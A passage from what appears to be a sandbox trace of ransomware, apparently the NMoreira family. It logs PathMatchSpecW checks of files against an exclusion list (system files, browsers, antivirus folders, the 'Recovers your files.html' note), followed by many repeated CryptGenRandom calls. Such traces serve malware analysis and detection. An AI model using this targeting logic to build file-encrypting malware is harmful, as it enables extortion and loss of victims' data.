pszSpec="*NTUSER.DAT*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*AppData*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*\\winrar\\*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*\\java\\*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*\\windows\\*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*\\ESET\\*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*\\AVG\\*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*\\AVIRA\\*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*Atheros*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*Realtek*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*bootmgr*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*boot*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*boot*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*CONFIG.SYS*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*IO.SYS*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*MSDOS.SYS*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*NTDETECT.COM*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*ntldr*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*chrome*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*opera*") returned 0 [0148.324] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", pszSpec="*firefox*") returned 0 [0148.324] wcslen (_String="\\\\?\\") returned 0x4 [0148.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad778 [0148.325] wcscmp (_String1=".", _String2=".") returned 0 [0148.325] FindNextFileW (in: hFindFile=0x9ad778, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.325] wcscmp (_String1="..", _String2=".") returned 1 [0148.325] wcscmp (_String1="..", _String2="..") returned 0 [0148.325] FindNextFileW (in: hFindFile=0x9ad778, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0148.325] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0148.326] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0148.326] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui", pszSpec="*") returned 1 [0148.326] strlen (_Str="NMoreira") returned 0x8 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, 